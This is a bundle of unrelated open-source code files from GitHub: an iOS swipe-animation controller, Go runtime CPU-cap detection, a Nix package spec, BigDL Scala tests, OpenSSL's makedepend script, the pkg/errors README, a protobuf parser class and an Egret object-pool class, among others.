// // NILViewController.m // TransformAnimations // // Created by Bryan Oltman on 5/24/13. // Copyright (c) 2013 Bryan Oltman. All rights reserved. // #import "NILViewController.h" @implementation NILViewController - (void)viewDidLoad { [super viewDidLoad]; UISwipeGestureRecognizer *recognizer = [[UISwipeGestureRecognizer alloc] initWithTarget:self action:@selector(viewSwiped:)]; recognizer.direction = UISwipeGestureRecognizerDirectionLeft; [self.leftTableView addGestureRecognizer:recognizer]; recognizer = [[UISwipeGestureRecognizer alloc] initWithTarget:self action:@selector(viewSwiped:)]; recognizer.direction = UISwipeGestureRecognizerDirectionRight; [self.rightTableView addGestureRecognizer:recognizer]; self.rightTableView.frame = CGRectOffset(self.rightTableView.frame, self.view.frame.size.width, 0); } - (void)viewSwiped:(UISwipeGestureRecognizer *)sender { CAAnimationEasingFunction f = CAAnimationEasingFunctionEaseOutElastic; CGFloat d = 1; if (sender.direction == UISwipeGestureRecognizerDirectionLeft && sender.view == self.leftTableView) { CATransform3D tr; // An example of how to "stack" transforms tr = CATransform3DMakeScale(2.5, 2.5, 1.0); tr = CATransform3DTranslate(tr, 95, 0, 0); [CAAnimation addAnimationToLayer:self.leftTableView.layer duration:d transform:tr // transform:CATransform3DMakeRotation(250, 0, 0, 1) // transform:CATransform3DMakeTranslation(-self.view.bounds.size.width, 0, 0) easingFunction:f]; [CAAnimation addAnimationToLayer:self.rightTableView.layer duration:d transform:CATransform3DMakeTranslation(-self.view.bounds.size.width, 0, 0) easingFunction:f]; } else if (sender.direction == UISwipeGestureRecognizerDirectionRight && sender.view == self.rightTableView) { [CAAnimation addAnimationToLayer:self.leftTableView.layer duration:d transform:CATransform3DIdentity easingFunction:f]; [CAAnimation addAnimationToLayer:self.rightTableView.layer duration:d transform:CATransform3DIdentity easingFunction:f]; } } #pragma mark - Table View - (NSInteger)tableView:(UITableView *)tableView numberOfRowsInSection:(NSInteger)section { return 150; } - (UITableViewCell *)tableView:(UITableView *)aTableView cellForRowAtIndexPath:(NSIndexPath *)aIndexPath { static NSString *reuseId = @"reuseId"; UITableViewCell *cell = [aTableView dequeueReusableCellWithIdentifier:reuseId]; if (!cell) { cell = [[UITableViewCell alloc] initWithStyle:UITableViewCellStyleDefault reuseIdentifier:reuseId]; } cell.textLabel.text = [NSString stringWithFormat:@"This is row %d", aIndexPath.row]; return cell; } @end
{ "pile_set_name": "Github" }
// Copyright 2019 The Go Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package runtime import ( "unsafe" ) // Return the minimum value seen for the zone CPU cap, or 0 if no cap is // detected. func getcpucap() uint64 { // The resource control block is an opaque object whose size is only // known to libc. In practice, given the contents, it is unlikely to // grow beyond 8KB so we'll use a static buffer of that size here. const rblkmaxsize = 8 * 1024 if rctlblk_size() > rblkmaxsize { return 0 } // The "zone.cpu-cap" resource control, as described in // resource_controls(5), "sets a limit on the amount of CPU time that // can be used by a zone. The unit used is the percentage of a single // CPU that can be used by all user threads in a zone, expressed as an // integer." A C string of the name must be passed to getrctl(2). name := []byte("zone.cpu-cap\x00") // To iterate over the list of values for a particular resource // control, we need two blocks: one for the previously read value and // one for the next value. var rblk0 [rblkmaxsize]byte var rblk1 [rblkmaxsize]byte rblk := &rblk0[0] rblkprev := &rblk1[0] var flag uint32 = _RCTL_FIRST var capval uint64 = 0 for { if getrctl(unsafe.Pointer(&name[0]), unsafe.Pointer(rblkprev), unsafe.Pointer(rblk), flag) != 0 { // The end of the sequence is reported as an ENOENT // failure, but determining the CPU cap is not critical // here. We'll treat any failure as if it were the end // of sequence. break } lflags := rctlblk_get_local_flags(unsafe.Pointer(rblk)) action := rctlblk_get_local_action(unsafe.Pointer(rblk), 0) if (lflags&_RCTL_LOCAL_MAXIMAL) == 0 && action == _RCTL_LOCAL_DENY { // This is a finite (not maximal) value representing a // cap (deny) action. v := rctlblk_get_value(unsafe.Pointer(rblk)) if capval == 0 || capval > v { capval = v } } // Swap the blocks around so that we can fetch the next value t := rblk rblk = rblkprev rblkprev = t flag = _RCTL_NEXT } return capval } func getncpu() int32 { n := int32(sysconf(__SC_NPROCESSORS_ONLN)) if n < 1 { return 1 } if cents := int32(getcpucap()); cents > 0 { // Convert from a percentage of CPUs to a number of CPUs, // rounding up to make use of a fractional CPU // e.g., 336% becomes 4 CPUs ncap := (cents + 99) / 100 if ncap < n { return ncap } } return n } //extern getrctl func getrctl(controlname, oldbuf, newbuf unsafe.Pointer, flags uint32) int32 //extern rctlblk_get_local_action func rctlblk_get_local_action(buf, signalp unsafe.Pointer) uint32 //extern rctlblk_get_local_flags func rctlblk_get_local_flags(buf unsafe.Pointer) uint32 //extern rctlblk_get_value func rctlblk_get_value(buf unsafe.Pointer) uint64 //extern rctlblk_size func rclblk_size() uintptr
{ "pile_set_name": "Github" }
{ fetchurl, ... }: { baseName = ''db3''; version = ''cl-20150302-git''; description = ''DB3 file reader''; deps = [ ]; src = fetchurl { url = ''http://beta.quicklisp.org/archive/cl-db3/2015-03-02/cl-db3-20150302-git.tgz''; sha256 = ''0mwdpb7cdvxdcbyg3ags6xzwhblai170q3p20njs3v73s30dbzxi''; }; packageName = "db3"; asdFilesToKeep = ["db3.asd"]; overrides = x: x; } /* (SYSTEM db3 DESCRIPTION DB3 file reader SHA256 0mwdpb7cdvxdcbyg3ags6xzwhblai170q3p20njs3v73s30dbzxi URL http://beta.quicklisp.org/archive/cl-db3/2015-03-02/cl-db3-20150302-git.tgz MD5 578896a3f60f474742f240b703f8c5f5 NAME db3 FILENAME db3 DEPS NIL DEPENDENCIES NIL VERSION cl-20150302-git SIBLINGS NIL PARASITES NIL) */
{ "pile_set_name": "Github" }
/* * Copyright 2016 The BigDL Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intel.analytics.bigdl.nn import com.intel.analytics.bigdl.tensor.Tensor import com.intel.analytics.bigdl.utils.T import com.intel.analytics.bigdl.utils.serializer.ModuleSerializationTest import org.scalatest.{BeforeAndAfter, FlatSpec, Matchers} import scala.util.Random @com.intel.analytics.bigdl.tags.Serial class SplitTableSpec extends FlatSpec with BeforeAndAfter with Matchers { "A BifurcateSplitTable " should "generate correct output and grad" in { val seed = 100 Random.setSeed(seed) val dim = 2 val module = new BifurcateSplitTable[Double](dim) val input = Tensor[Double](3, 4).randn() val expectedGradInput = Tensor[Double]().resizeAs(input).randn() val gradOutput = T(expectedGradInput.narrow(dim, 1, 2), expectedGradInput.narrow(dim, 3, 2)) val output = module.forward(input) val gradInput = module.backward(input, gradOutput) output.length() should be (2) val left = output(1).asInstanceOf[Tensor[Double]] val right = output(2).asInstanceOf[Tensor[Double]] left should be (input.narrow(dim, 1, 2)) right should be (input.narrow(dim, 3, 2)) gradInput should be (expectedGradInput) } } class BifurcateSplitTableSerialTest extends ModuleSerializationTest { override def test(): Unit = { val batchNorm = BifurcateSplitTable[Float](1).setName("batchNorm") val input = Tensor[Float](2, 5).apply1(_ => Random.nextFloat()) runSerializationTest(batchNorm, input) } } class SplitTableSerialTest extends ModuleSerializationTest { override def test(): Unit = { val splitTable = SplitTable[Float](2).setName("splitTable") val input = Tensor[Float](2, 10).apply1( e => Random.nextFloat()) runSerializationTest(splitTable, input) } }
{ "pile_set_name": "Github" }
$winner: #5cc900; $border: #cef0af; $finalists: #effae4; $empty: #fafdf6; .track { background-color: $winner; } .winner { border-left: solid 1px $border; border-right: solid 1px $border; color: $winner; } .finalist { background-color: $finalists; } .filler { background-color: $finalists; } .empty { background-color: $empty; }
{ "pile_set_name": "Github" }
/** * This file is part of OpenMediaVault. * * @license http://www.gnu.org/licenses/gpl.html GPL Version 3 * @author Volker Theile <[email protected]> * @copyright Copyright (c) 2009-2020 Volker Theile * * OpenMediaVault is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * any later version. * * OpenMediaVault is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with OpenMediaVault. If not, see <http://www.gnu.org/licenses/>. */ // require("js/omv/workspace/window/Container.js") // require("js/omv/tab/Panel.js") /** * @ingroup webgui * A workspace window displaying a tab panel. * @class OMV.workspace.window.Tab * @derived OMV.workspace.window.Container */ Ext.define("OMV.workspace.window.Tab", { extend: "OMV.workspace.window.Container", requires: [ "OMV.tab.Panel" ], tabClassName: "OMV.tab.Panel", constructor: function(config) { var me = this; config = Ext.apply({ tabConfig: {}, tabItems: [] }, config || {}); me.callParent([ config ]); }, getWindowItems: function() { var me = this; me.tp = me.initTab(); return me.tp; }, /** * Initialize the tab panel displayed in this window. * @return The tab panel object. */ initTab: function() { var me = this; return Ext.create(me.tabClassName, Ext.apply({ border: false, activeTab: 0, layoutOnTabChange: true, enableTabScroll: true, defaults: { readOnly: me.readOnly }, items: me.getTabItems(me) }, me.getTabConfig(me))); }, /** * Returns additional tab configuration options. * @param c This component object. * @return The tab panel configuration object. */ getTabConfig: function(c) { return this.tabConfig; }, /** * Returns the items displayed in the property window form. * This function must be overwritten by every derived class. * @param c This component object. * @return An array of items displayed in the tab panel. */ getTabItems: function(c) { return this.tabItems; }, /** * Returns the tab panel. * @return The tab panel object. */ getTab: function() { return this.tp; }, /** * Validate the tab values. * @return Returns TRUE if client-side validation on the tab * is successful. */ isValid: function() { var me = this; var valid = true; var tab = me.getTab(); tab.items.each(function(item) { // Clear invalid flag. tab.clearInvalidTab(item); // Check if there is a validation function and execute it // if existing. if(Ext.isFunction(item.isValid)) { if(!item.isValid()) { valid = false; // Mark tab panel component as invalid. tab.markInvalidTab(item); } } }); return valid; }, /** * Clears all invalid field messages in this tab and its sub panels. */ clearInvalid: function() { var me = this; var tab = me.getTab(); tab.items.each(function(item) { tab.clearInvalidTab(item); if(Ext.isFunction(item.clearInvalid)) item.clearInvalid(); }); }, /** * Mark fields in this tab and its sub panels invalid in bulk. * @param errors Either an array in the tab * [{id:'fieldId', msg:'The message'},...] or an object hash of * {id: msg, id2: msg2} * @return The basic form panel. */ markInvalid: function(errors) { var me = this; me.getTab().items.each(function(item) { if(Ext.isFunction(item.markInvalid)) item.markInvalid(errors); }); }, /** * Checks if any fields in this tab have changed from their original * values. If the values have been loaded into the tab then these are * the original ones. * @return Returns TRUE if any fields in this tab have changed from * their original values. */ isDirty: function() { var me = this; var dirty = false; me.getTab().items.each(function(item) { if(Ext.isFunction(item.isDirty)) dirty = item.isDirty(); if(dirty) // Abort immediatelly return false; }); return dirty; }, /** * Set values for fields in this tab in bulk. * @param values The values to set in the tab of an object hash. * @return void */ setValues: function(values) { var me = this; me.getTab().items.each(function(item) { if(Ext.isFunction(item.setValues)) item.setValues(values); }); }, /** * Returns the fields in this tab as an object with key/value pairs. * @return An array of key/value pairs. */ getValues: function() { var me = this; var values = {}; me.getTab().items.each(function(item) { if(Ext.isFunction(item.getValues)) { var v = item.getValues(); Ext.applyEx(values, v); } }); return values; }, /** * Method that is called when the 'Reset' button is pressed. The reset * will be forwarded to the active tab. * @param this The window itself. */ onResetButton: function() { var me = this; var activeTab = me.getTab().getActiveTab(); if(Ext.isFunction(activeTab.reset)) activeTab.reset(); } });
{ "pile_set_name": "Github" }
#!/bin/sh # Do a makedepend, only leave out the standard headers # Written by Ben Laurie <[email protected]> 19 Jan 1999 TOP=$1 shift if [ "$1" = "-MD" ]; then shift MAKEDEPEND=$1 shift fi if [ "$MAKEDEPEND" = "" ]; then MAKEDEPEND=makedepend; fi cp Makefile Makefile.save # fake the presence of Kerberos touch $TOP/krb5.h if ${MAKEDEPEND} --version 2>&1 | grep "clang" > /dev/null || echo $MAKEDEPEND | grep "gcc" > /dev/null; then args="" while [ $# -gt 0 ]; do if [ "$1" != "--" ]; then args="$args $1"; fi shift done sed -e '/^# DO NOT DELETE.*/,$d' < Makefile > Makefile.tmp echo '# DO NOT DELETE THIS LINE -- make depend depends on it.' >> Makefile.tmp ${MAKEDEPEND} -Werror -D OPENSSL_DOING_MAKEDEPEND -M $args >> Makefile.tmp || exit 1 ${PERL} $TOP/util/clean-depend.pl < Makefile.tmp > Makefile.new RC=$? rm -f Makefile.tmp else ${MAKEDEPEND} -D OPENSSL_DOING_MAKEDEPEND $@ && \ ${PERL} $TOP/util/clean-depend.pl < Makefile > Makefile.new RC=$? fi mv Makefile.new Makefile # unfake the presence of Kerberos rm $TOP/krb5.h exit $RC
{ "pile_set_name": "Github" }
/* * Copyright 2014 Advanced Micro Devices, Inc. * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. * */ #ifndef __AMDGPU_CONNECTORS_H__ #define __AMDGPU_CONNECTORS_H__ struct edid *amdgpu_connector_edid(struct drm_connector *connector); void amdgpu_connector_hotplug(struct drm_connector *connector); int amdgpu_connector_get_monitor_bpc(struct drm_connector *connector); u16 amdgpu_connector_encoder_get_dp_bridge_encoder_id(struct drm_connector *connector); bool amdgpu_connector_is_dp12_capable(struct drm_connector *connector); void amdgpu_connector_add(struct amdgpu_device *adev, uint32_t connector_id, uint32_t supported_device, int connector_type, struct amdgpu_i2c_bus_rec *i2c_bus, uint16_t connector_object_id, struct amdgpu_hpd *hpd, struct amdgpu_router *router); #endif
{ "pile_set_name": "Github" }
# errors [![Travis-CI](https://travis-ci.org/pkg/errors.svg)](https://travis-ci.org/pkg/errors) [![AppVeyor](https://ci.appveyor.com/api/projects/status/b98mptawhudj53ep/branch/master?svg=true)](https://ci.appveyor.com/project/davecheney/errors/branch/master) [![GoDoc](https://godoc.org/github.com/pkg/errors?status.svg)](http://godoc.org/github.com/pkg/errors) [![Report card](https://goreportcard.com/badge/github.com/pkg/errors)](https://goreportcard.com/report/github.com/pkg/errors) [![Sourcegraph](https://sourcegraph.com/github.com/pkg/errors/-/badge.svg)](https://sourcegraph.com/github.com/pkg/errors?badge) Package errors provides simple error handling primitives. `go get github.com/pkg/errors` The traditional error handling idiom in Go is roughly akin to ```go if err != nil { return err } ``` which applied recursively up the call stack results in error reports without context or debugging information. The errors package allows programmers to add context to the failure path in their code in a way that does not destroy the original value of the error. ## Adding context to an error The errors.Wrap function returns a new error that adds context to the original error. For example ```go _, err := ioutil.ReadAll(r) if err != nil { return errors.Wrap(err, "read failed") } ``` ## Retrieving the cause of an error Using `errors.Wrap` constructs a stack of errors, adding context to the preceding error. Depending on the nature of the error it may be necessary to reverse the operation of errors.Wrap to retrieve the original error for inspection. Any error value which implements this interface can be inspected by `errors.Cause`. ```go type causer interface { Cause() error } ``` `errors.Cause` will recursively retrieve the topmost error which does not implement `causer`, which is assumed to be the original cause. For example: ```go switch err := errors.Cause(err).(type) { case *MyError: // handle specifically default: // unknown error } ``` [Read the package documentation for more information](https://godoc.org/github.com/pkg/errors). ## Roadmap With the upcoming [Go2 error proposals](https://go.googlesource.com/proposal/+/master/design/go2draft.md) this package is moving into maintenance mode. The roadmap for a 1.0 release is as follows: - 0.9. Remove pre Go 1.9 and Go 1.10 support, address outstanding pull requests (if possible) - 1.0. Final release. ## Contributing Because of the Go2 errors changes, this package is not accepting proposals for new functionality. With that said, we welcome pull requests, bug fixes and issue reports. Before sending a PR, please discuss your change by raising an issue. ## License BSD-2-Clause
{ "pile_set_name": "Github" }
@extends('core::layout') @section('content') <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="row"> <div class="col-md-6"> <h3><i class="icon-support"></i> Suporte</h3> </div> </div> <div class="row"> <div class="col-md-12"> <hr> </div> </div> <div class="row"> <div class="col-md-12"> <h4><strong>Problemas com a sua Assinatura ou Site?</strong></h4> Informe-nos através do email: <strong><a href="mailto:[email protected]">[email protected]</a></strong> </div> <div class="col-md-12">&nbsp;</div> <div class="col-md-12"> <h4><strong>Tem dúvidas sobre o conteúdo e precisa de um help?</strong></h4> Temos um canal exclusivo para trocar ideias: <br> <strong><a href="https://telegram.me/codecasters" target="_blank">https://telegram.me/codecasters</a></strong> </div> </div> </div> </div> </div> @endsection
{ "pile_set_name": "Github" }
// Copyright 2013 Square, Inc. package com.squareup.protoparser; import com.google.auto.value.AutoValue; import com.squareup.protoparser.Utils.Nullable; import java.util.ArrayList; import java.util.Collection; import java.util.List; import static com.squareup.protoparser.Utils.checkNotNull; import static com.squareup.protoparser.Utils.immutableCopyOf; /** A single {@code .proto} file. */ @AutoValue public abstract class ProtoFile { static final int MIN_TAG_VALUE = 1; static final int MAX_TAG_VALUE = (1 << 29) - 1; // 536,870,911 private static final int RESERVED_TAG_VALUE_START = 19000; private static final int RESERVED_TAG_VALUE_END = 19999; /** Syntax version. */ public enum Syntax { PROTO_2("proto2"), PROTO_3("proto3"); private final String name; Syntax(String name) { this.name = name; } } /** True if the supplied value is in the valid tag range and not reserved. */ static boolean isValidTag(int value) { return (value >= MIN_TAG_VALUE && value < RESERVED_TAG_VALUE_START) || (value > RESERVED_TAG_VALUE_END && value <= MAX_TAG_VALUE); } public static Builder builder(String filePath) { return new Builder(checkNotNull(filePath, "filePath")); } ProtoFile() { } public abstract String filePath(); @Nullable public abstract String packageName(); @Nullable public abstract Syntax syntax(); public abstract List<String> dependencies(); public abstract List<String> publicDependencies(); public abstract List<TypeElement> typeElements(); public abstract List<ServiceElement> services(); public abstract List<ExtendElement> extendDeclarations(); public abstract List<OptionElement> options(); public final String toSchema() { StringBuilder builder = new StringBuilder(); if (!filePath().isEmpty()) { builder.append("// ").append(filePath()).append('\n'); } if (packageName() != null) { builder.append("package ").append(packageName()).append(";\n"); } if (syntax() != null) { builder.append("syntax \"").append(syntax().name).append("\";\n"); } if (!dependencies().isEmpty() || !publicDependencies().isEmpty()) { builder.append('\n'); for (String dependency : dependencies()) { builder.append("import \"").append(dependency).append("\";\n"); } for (String publicDependency : publicDependencies()) { builder.append("import public \"").append(publicDependency).append("\";\n"); } } if (!options().isEmpty()) { builder.append('\n'); for (OptionElement option : options()) { builder.append(option.toSchemaDeclaration()); } } if (!typeElements().isEmpty()) { builder.append('\n'); for (TypeElement typeElement : typeElements()) { builder.append(typeElement.toSchema()); } } if (!extendDeclarations().isEmpty()) { builder.append('\n'); for (ExtendElement extendDeclaration : extendDeclarations()) { builder.append(extendDeclaration.toSchema()); } } if (!services().isEmpty()) { builder.append('\n'); for (ServiceElement service : services()) { builder.append(service.toSchema()); } } return builder.toString(); } public static final class Builder { private final String filePath; private String packageName; private Syntax syntax; private final List<String> dependencies = new ArrayList<>(); private final List<String> publicDependencies = new ArrayList<>(); private final List<TypeElement> types = new ArrayList<>(); private final List<ServiceElement> services = new ArrayList<>(); private final List<ExtendElement> extendDeclarations = new ArrayList<>(); private final List<OptionElement> options = new ArrayList<>(); Builder(String filePath) { this.filePath = filePath; } public Builder packageName(String packageName) { this.packageName = checkNotNull(packageName, "packageName"); return this; } public Builder syntax(Syntax syntax) { this.syntax = checkNotNull(syntax, "syntax"); return this; } public Builder addDependency(String dependency) { dependencies.add(checkNotNull(dependency, "dependency")); return this; } public Builder addDependencies(Collection<String> dependencies) { for (String dependency : checkNotNull(dependencies, "dependencies")) { addDependency(dependency); } return this; } public Builder addPublicDependency(String dependency) { publicDependencies.add(checkNotNull(dependency, "dependency")); return this; } public Builder addPublicDependencies(Collection<String> dependencies) { for (String dependency : checkNotNull(dependencies, "dependencies")) { addPublicDependency(dependency); } return this; } public Builder addType(TypeElement type) { types.add(checkNotNull(type, "type")); return this; } public Builder addTypes(Collection<TypeElement> types) { for (TypeElement type : checkNotNull(types, "types")) { addType(type); } return this; } public Builder addService(ServiceElement service) { services.add(checkNotNull(service, "service")); return this; } public Builder addServices(Collection<ServiceElement> services) { for (ServiceElement service : checkNotNull(services, "services")) { addService(service); } return this; } public Builder addExtendDeclaration(ExtendElement extend) { extendDeclarations.add(checkNotNull(extend, "extend")); return this; } public Builder addExtendDeclarations(Collection<ExtendElement> extendDeclarations) { for (ExtendElement extendDeclaration : checkNotNull(extendDeclarations, "extendDeclarations")) { addExtendDeclaration(extendDeclaration); } return this; } public Builder addOption(OptionElement option) { options.add(checkNotNull(option, "option")); return this; } public Builder addOptions(Collection<OptionElement> options) { for (OptionElement option : checkNotNull(options, "options")) { addOption(option); } return this; } public ProtoFile build() { return new AutoValue_ProtoFile(filePath, packageName, syntax, immutableCopyOf(dependencies), immutableCopyOf(publicDependencies), immutableCopyOf(types), immutableCopyOf(services), immutableCopyOf(extendDeclarations), immutableCopyOf(options)); } } }
{ "pile_set_name": "Github" }
# This file is automatically generated by Android Tools. # Do not modify this file -- YOUR CHANGES WILL BE ERASED! # # This file must be checked in Version Control Systems. # # To customize properties used by the Ant build system use, # "ant.properties", and override values to adapt the script to your # project structure. # Project target. target=android-17
{ "pile_set_name": "Github" }
////////////////////////////////////////////////////////////////////////////////////// // // Copyright (c) 2014-present, Egret Technology. // All rights reserved. // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // * Redistributions of source code must retain the above copyright // notice, this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright // notice, this list of conditions and the following disclaimer in the // documentation and/or other materials provided with the distribution. // * Neither the name of the Egret nor the // names of its contributors may be used to endorse or promote products // derived from this software without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY EGRET AND CONTRIBUTORS "AS IS" AND ANY EXPRESS // OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES // OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. // IN NO EVENT SHALL EGRET AND CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, // INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT // LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;LOSS OF USE, DATA, // OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF // LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING // NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, // EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. // ////////////////////////////////////////////////////////////////////////////////////// namespace egret { /** * Tool class for object cache repeat use, which can be used to construct an object pool. Objects are automatically recycled after a certain duration. * @version Egret 2.4 * @platform Web,Native * @includeExample extension/game/utils/Recycler.ts * @private * @language en_US */ /** * 对象缓存复用工具类,可用于构建对象池,一段时间后会自动回收对象。 * @version Egret 2.4 * @platform Web,Native * @includeExample extension/game/utils/Recycler.ts * @private * @language zh_CN */ export class Recycler extends HashObject{ /** * Create an egret.Recycler object * @param autoDisposeTime {number} Number of frames when objects are destroyed automatically. Default value: 300 * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 创建一个 egret.Recycler 对象 * @param autoDisposeTime {number} 多少帧后自动销毁对象,默认值300 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public constructor(autoDisposeTime:number = 300){ super(); if(autoDisposeTime<1) autoDisposeTime = 1; this.autoDisposeTime = autoDisposeTime; this.frameCount = 0; } /** * @private */ public static _callBackList:any[] = []; public static $init():void { ticker.$startTick(Recycler.onUpdate, Recycler); } public static onUpdate(timeStamp:number):boolean { let list = Recycler._callBackList; for (let i = list.length - 1; i >= 0; i--) { list[i].$checkFrame(); } return false; } /** * @private * 多少帧后自动销毁对象。 */ private autoDisposeTime:number; /** * @private */ private frameCount:number; /** * @private * */ public $checkFrame():void{ this.frameCount--; if(this.frameCount<=0){ this.dispose(); } } /** * @private */ private objectPool:any[] = []; /** * @private */ private _length:number = 0; /** * Number of cached objects" * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 缓存的对象数量 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public get length():number{ return this._length; } /** * Cache an object for repeat use * @param object {any} The object to be cached * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 缓存一个对象以复用 * @param object {any} 需要缓存的对象 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public push(object:any):void{ let pool:any[] = this.objectPool; if(pool.indexOf(object)==-1){ pool.push(object); if (object.__recycle) { object.__recycle(); } this._length++; if(this.frameCount==0){ this.frameCount = this.autoDisposeTime; Recycler._callBackList.push(this); } } } /** * Obtain a cached object * @returns {any} The obtained cached object * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 获取一个缓存的对象 * @returns {any} 获得的缓存对象 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public pop():any{ if(this._length==0) return null; this._length--; return this.objectPool.pop(); } /** * Immediately clear all cached objects. * @version Egret 2.4 * @platform Web,Native * @language en_US */ /** * 立即清空所有缓存的对象。 * @version Egret 2.4 * @platform Web,Native * @language zh_CN */ public dispose():void{ if(this._length>0){ this.objectPool = []; this._length = 0; } this.frameCount = 0; let list:any[] = Recycler._callBackList; let index:number = list.indexOf(this); if(index!=-1){ list.splice(index,1); } } } Recycler.$init(); }
{ "pile_set_name": "Github" }
nice [video](http://www.youtube.com/video\-on\e). Nice\-vide\o star \* nice ![video](http://www.youtube.com/video\-on\e). Nice\-vide\o star \* [video]: http://www.youtube.com/video\-on\e [video] and <http://www.youtube.com/video\-on\e> and <m\a\[email protected]>
{ "pile_set_name": "Github" }